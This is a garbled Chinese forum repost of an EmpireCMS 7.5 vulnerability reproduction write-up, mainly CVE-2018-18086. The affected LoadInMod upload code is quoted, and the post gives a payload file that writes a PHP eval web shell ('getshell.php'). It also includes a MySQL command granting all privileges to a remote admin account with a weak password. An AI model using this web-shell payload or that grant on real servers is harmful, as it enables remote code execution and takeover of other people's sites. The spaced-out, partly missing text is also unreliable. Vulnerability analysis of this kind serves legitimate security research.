搜索

[18589] 2021-07-02_Web安全EmpireCMS漏洞常见漏洞分析及复现

文档创建者:s7ckTeam
浏览次数:35
最后更新:2025-01-18
2021-07-02_Web安全EmpireCMS漏洞常见漏洞分析及复现 W e b   |   E m p i r e C M S c k i n   H A C K   2 0 2 1 - 0 7 - 0 2 E m p i r e C M S ( c m s ) c m s h t t p : / / l o c a l h o s t / e / i n s t a l l
m y s q l l o c a l h o s t 1 2 7 . 0 . 0 . 1 v p s v p s
b i n d - a d d r e s s   =   1 2 7 . 0 . 0 . 1 a d m i n e m p i r e c m s / e t c / m y s q l / m y . c o n f g r a n t   a l l   o n   * . *   t o   a d m i n @ ' % '   i d e n t i f i e d   b y   ' 1 2 3 4 5 6 '   w i t h   g r a n t   o p t i o n ; f l u s h   p r i v i l e g e s ;

使 访 i n s t a l l . o f f . o f f
g e t s h e l l ( C V E - 2 0 1 8 - 1 8 0 8 6 ) E m p i r e C M S   7 . 5 , , E m p i r e C M S 7 . 5 / e / c l a s s / m o d d o f u n . p h p L o a d I n M o d ,
/ / L o a d I n M o d l o c a l h o s t / E m p i r e C M S / e / c l a s s / m o d d o f u n . p h p 使 t i m e ( ) . m a k e p a s s w o r d ( 1 0 ) @ i n c l u d e ( $ p a t h ) / / e l s e i f ( $ e n e w s = = " L o a d I n M o d " ) {         $ f i l e = $ _ F I L E S [ ' f i l e ' ] [ ' t m p _ n a m e ' ] ;         $ f i l e _ n a m e = $ _ F I L E S [ ' f i l e ' ] [ ' n a m e ' ] ;         $ f i l e _ t y p e = $ _ F I L E S [ ' f i l e ' ] [ ' t y p e ' ] ;         $ f i l e _ s i z e = $ _ F I L E S [ ' f i l e ' ] [ ' s i z e ' ] ;         L o a d I n M o d ( $ _ P O S T , $ f i l e , $ f i l e _ n a m e , $ f i l e _ t y p e , $ f i l e _ s i z e , $ l o g i n i n i d , $ l o g i n i n ) ; } / /         $ p a t h = E C M S _ P A T H . " e / d a t a / t m p / m o d / u p l o a d m " . t i m e ( ) . m a k e _ p a s s w o r d ( 1 0 ) . " . p h p " ;         $ c p = @ m o v e _ u p l o a d e d _ f i l e ( $ f i l e , $ p a t h ) ;         i f ( ! $ c p )         {                 p r i n t e r r o r ( " E m p t y L o a d I n M o d " , " " ) ;         }         D o C h m o d F i l e ( $ p a t h ) ;         @ i n c l u d e ( $ p a t h ) ;         U p d a t e T b D e f M o d ( $ t i d , $ t b n a m e , $ m i d ) ; / / f u n c t i o n   m a k e _ p a s s w o r d ( $ p w _ l e n g t h ) {         $ l o w _ a s c i i _ b o u n d = 4 8 ;         $ u p p e r _ a s c i i _ b o u n d = 1 2 2 ;         $ n o t u s e = a r r a y ( 5 8 , 5 9 , 6 0 , 6 1 , 6 2 , 6 3 , 6 4 , 9 1 , 9 2 , 9 3 , 9 4 , 9 5 , 9 6 ) ;         w h i l e ( $ i < $ p w _ l e n g t h )         {                 i f ( P H P _ V E R S I O N < ' 4 . 2 . 0 ' )                 {                         m t _ s r a n d ( ( d o u b l e ) m i c r o t i m e ( ) * 1 0 0 0 0 0 0 ) ;                 }                 m t _ s r a n d ( ) ;                 $ r a n d n u m = m t _ r a n d ( $ l o w _ a s c i i _ b o u n d , $ u p p e r _ a s c i i _ b o u n d ) ;                 i f ( ! i n _ a r r a y ( $ r a n d n u m , $ n o t u s e ) )                 {                         $ p a s s w o r d 1 = $ p a s s w o r d 1 . c h r ( $ r a n d n u m ) ;                         $ i + + ;                 }         }         r e t u r n   $ p a s s w o r d 1 ; }
1 . p h p 1 . p h p . m o d $ < ? p h p   f i l e _ p u t _ c o n t e n t s ( " g e t s h e l l . p h p " , " < ? p h p   @ e v a l ( $ _ P O S T [ c m d ] ) ;   ? > " ) ; ? >
访 s h e l l 访 访
1 . w a f 5 0 0
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理